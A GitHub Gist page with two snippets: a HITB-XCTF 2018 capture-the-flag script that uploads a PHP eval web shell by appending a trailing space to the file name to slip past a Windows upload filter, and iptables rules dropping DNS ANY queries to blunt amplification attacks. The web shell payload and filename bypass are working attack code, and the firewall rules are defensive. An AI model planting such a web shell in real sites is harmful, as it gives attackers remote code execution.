Skip to content

Instantly share code, notes, and snippets.

@pich4ya
pich4ya / hitbxctf2018_upload.py
Created Apr 14, 2018
HITB-XCTF 2018 - Upload (Web) Writeup
View hitbxctf2018_upload.py
# @author LongCat (Pichaya Morimoto)
import requests, string
# On Windows OS move_uploaded_file function will convert "foo.php"
# followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to "foo.php".
# http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')}
values = {'submit': 'upload'}
phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip()
print phpshell
@guerrerocarlos
guerrerocarlos / block_ddos
Last active Mar 14, 2019
Blocking all ANY queries in DNS server to prevent DDOS DNS amplification attack
View block_ddos
iptables --flush
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -m recent --set --name dnsanyquery
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -m recent --name dnsanyquery --rcheck --seconds 60 --hitcount 1 -j DROP
iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname . --qtype ANY) -j DROP
#iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname isc.org --qtype ANY) -j DROP
#iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname isc.org. --qtype ANY) -j DROP
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -j DROP
#para bloquear ataque isc.org
iptables -A INPUT -p udp -m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP
You can’t perform that action at this time.